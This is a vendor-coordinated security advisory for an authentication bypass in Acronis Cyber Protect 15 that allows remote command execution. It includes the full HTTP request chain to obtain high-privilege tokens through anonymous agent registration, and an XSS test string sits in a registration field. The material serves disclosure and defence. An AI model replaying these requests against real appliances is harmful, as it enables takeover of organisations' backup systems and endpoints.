usd-2022-008 | Authentication Bypass with subsequent Remote Command Execution in Acronis Cyber Protect

Advisory ID: usd-2022-0008
Product: Acronis Cyber Protect
Affected Version: Server Version 15.0.28503
Vulnerability Type: Authentication Bypass (CWE-305)
Security Risk: Critical
Vendor URL: https://www.acronis.com/en-us/products/cyber-protect/
Vendor Status: Fixed
CVE IDs: CVE-2022-3405, CVE-2022-30995
CVE Links: https://nvd.nist.gov/vuln/detail/CVE-2022-3405, https://nvd.nist.gov/vuln/detail/CVE-2022-30995

 

Introduction

The Acronis Cyber Protect appliance, in its default configuration, allows the anonymous registration of new backup/protection agents on new endpoints. This API endpoint also generates bearer tokens which the agent then uses to authenticate to the appliance. As the management web console is running on the same port as the API for the agents, this bearer token is also valid for any actions on the web console. This allows an attacker with network access to the appliance to start the registration of a new agent, retrieve a bearer token and then manipulate any settings on the appliance via the available functions in the web console. The web console contains multiple possibilities to execute arbitrary commands on both the agents (e.g., via PreCommands for a backup) and also the appliance (e.g., via a Validation job on the agent of the appliance). These options can easily be set with the provided bearer token, which leads to a complete compromise of all agents and the appliance itself.

Proof of Concept

A high-privileged access_token can be obtained as follows:

  1. Send Token Request using Resource Owner Password Credentials flow (grant_type=password)
POST /idp/token HTTP/1.1
Host: 172.16.164.130:9877
User-Agent: Go-http-client/1.1
Content-Length: 39
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

 

grant_type=password&password=&username=

The IdP responds with an access_token: AT1

HTTP/1.1 200 OK
Content-Length: 2475
[...]{"access_token":"eyJhbGciOiJSUzI1NiIsImVhcCI6MSwiaXJpIjoiWVV4cUV3ZXY4MmVTRXVpQkJGM1loVSIsImtpZCI6IjZjOWIx[REDACTED]","token_type":"bearer","expires_in":86399,"expires_on":1644158167,"id_token":"eyJhbGciOiJSUzI1NiIsImtpZCI6IjZjOWI[...]","scope":"urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:oauth2_client_admin(backup_agent) urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:oauth2_client_admin(backup_storage) urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_registrar urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:anonymous urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:oauth2_client_admin"}
  1. AT1 can in the following be used to register an OAuth 2.0 client as follows:
POST /api/agent_manager/v2/agent_registrations HTTP/1.1
Host: 172.16.164.130:9877
Content-Length: 1314
Authorization: bearer eyJhbGciOiJSUzI1NiIsImVhcCI6MSwiaXJpIjoiW[REDACTED:AT1]
Content-Type: application/json
Accept-Encoding: gzip

 

{"id":"51088f07-76df-4933-8382-ce8ad4c58401","oauth_client_secret":"56632gryjzvcqfk2aiogwpxup4a6pgfdrdwvyiesz4l6f7lvhj44","hostname":"test","core_version":{"current":{"release_id":"1.15.0","build":"348"}},"units":[{"name":"crs","version":{"current":{"release_id":"0.0.0","build":"1"}}},{"name":"sh-inventory","version":{"current":{"release_id":"0.0.0","build":"1"}}},{"name":"task-manager","version":{"current":{"release_id":"0.0.0","build":"1"}}},{"name":"atp-agent","version":{"current":{"release_id":"0.0.0","build":"1"}}},{"name":"atp-downloader","version":{"current":{"release_id":"0.0.0","build":"1"}}},{"name":"atp-scan-agent","version":{"current":{"release_id":"0.0.0","build":"1"}}},{"name":"active_protection","version":{"current":{"release_id":"0.0.0","build":"1"}}},{"name":"mms","version":{"current":{"release_id":"0.0.0","build":"1"}}},{"name":"sync-unit","version":{"current":{"release_id":"0.0.0","build":"1"}}},{"name":"cyber-protect-service","version":{"current":{"release_id":"0.0.0","build":"1"}}}],"meta":{},"auto_update":false,"installer_version":{"release_id":"15.0.1","build":"28503"},"platform":{"family":"WINDOWS","arch":"X64","name":"\\"'<svg/onload=alert(1);>;#--","version_major":0,"version_minor":0},"zmq_agent_public_key":"lGfb+FxD.M?1wA6Hk+@LH:RlPY4A]W)vqJ=EWX2f","timezone":"+0100"}

The above request includes a controlled "id" (=client_id) and "oauth_client_secret" (=client_secret).

  1. The aforementioned client_id and client_secret can then be used to perform a Client Credentials Flow (grant_type=client_credentials) to obtain a high-privileged access_token AT2:
POST /idp/token HTTP/1.1
Host: 172.16.164.130:9877
User-Agent: Go-http-client/1.1
Content-Length: 143
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

 

client_id=51088f07-76df-4933-8382-ce8ad4c58401&client_secret=56632gryjzvcqfk2aiogwpxup4a6pgfdrdwvyiesz4l6f7lvhj44&grant_type=client_credentials

 

The IdP responds as follows:

HTTP/1.1 200 OK
Content-Length: 13079
[...]{"access_token":"eyJhbGciOiJSUzI1NiIsImVhcCI6MSwiaXJpIjoicE1nWHdKS[REDACTED:AT2]","token_type":"bearer","expires_in":2591999,"expires_on":1646663799,"id_token":"eyJhbGciOiJSUzI1[...]","scope":"urn:acronis.com:tenant-id:alert_manager:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:active_protection urn:acronis.com:tenant-id:policy_management:00000000-0000-0000-0000-000000000000:read urn:acronis.com:tenant-id:s3_storage:00000000-0000-0000-0000-000000000000:write urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:agent_core urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_registrar urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_unregistrar urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_viewer urn:acronis.com:tenant-id:apn:00000000-0000-0000-0000-000000000000:node urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_updater urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:unit_configuration_viewer urn:acronis.com:tenant-id:resource_management:00000000-0000-0000-0000-000000000000:read urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:oauth2_client_admin(self) urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_unit_metadata_updater urn:acronis.com:tenant-id:policy_manager:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:scan_service:00000000-0000-0000-0000-000000000000:cwl_requestor urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|x#ATP_*:consumer urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:host_uploader urn:acronis.com:tenant-id:accounts:00000000-0000-0000-0000-000000000000:licensing_viewer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:tenant_viewer urn:acronis.com:tenant-id:vault_manager:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:resource_manager:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:scan_service:00000000-0000-0000-0000-000000000000:scan_agent urn:acronis.com:tenant-id:accounts:00000000-0000-0000-0000-000000000000:licensing_admin urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|ATP_*:issuer urn:acronis.com:tenant-id:monitoring:00000000-0000-0000-0000-000000000000:provider urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:atp-agent urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000:trusted_viewer urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:ou_uploader urn:acronis.com:tenant-id:credentials_store:00000000-0000-0000-0000-000000000000:consumer urn:acronis.com:tenant-id:dpm:00000000-0000-0000-0000-000000000000:statistics_uploader urn:acronis.com:tenant-id:software_inventory:00000000-0000-0000-0000-000000000000:data_uploader urn:acronis.com:tenant-id:storage:00000000-0000-0000-0000-000000000000:readonly urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|ATP_*:consumer urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|SHI_VA:issuer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:atp-downloader urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|ATP_BackupScan:consumer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:atp-scan-agent urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|x#ATP_BackupScan*:consumer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:crs urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000:consumer urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000:issuer urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000:viewer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:cyber-protect-service urn:acronis.com:tenant-id:frs:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:corp-wl:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:bitdefender-cleanset:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_host_info_modifier urn:acronis.com:tenant-id:protection:00000000-0000-0000-0000-000000000000:readwrite urn:acronis.com:tenant-id:credentials_store:00000000-0000-0000-0000-000000000000:owner urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:mms urn:acronis.com:tenant-id:scan_service:00000000-0000-0000-0000-000000000000:restore_agent urn:acronis.com:tenant-id:storage:00000000-0000-0000-0000-000000000000:readwrite urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:sh-inventory urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|SHI_*:consumer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:sync-unit urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000:delegate urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:task-manager"}

AT2 inherits high privileges, as can already be observed at first glance via the returned scope parameter. Exemplary exploit paths are demonstrated within the attached "acronis_pwn_agent.py" and "acronis_pwn_appliance.py" scripts. With minor adjustments, these Python scripts can be used to automatically archive code execution on a remote Acronis Cyber Protect instance.

Fix

  1. Anonymous registration should be disabled by default. This does not prevent attacks from already authenticated agents.
  2. Bearer tokens for agents should only be valid for the required functions of each agent. Their scope should be limited.

References

Timeline

  • 2021-02-04: Vulnerability identified by Sandro Tolksdorf
  • 2022-02-07: Initial contact via security@acronis.com
  • 2022-02-08: Vulnerability is submitted via HackerOne
  • 2022-04-22: Fixed by vendor
  • 2022-11-08: The advisory is published in coordination with the vendor

Credits

This security vulnerability was found by Sandro Tolksdorf of usd AG.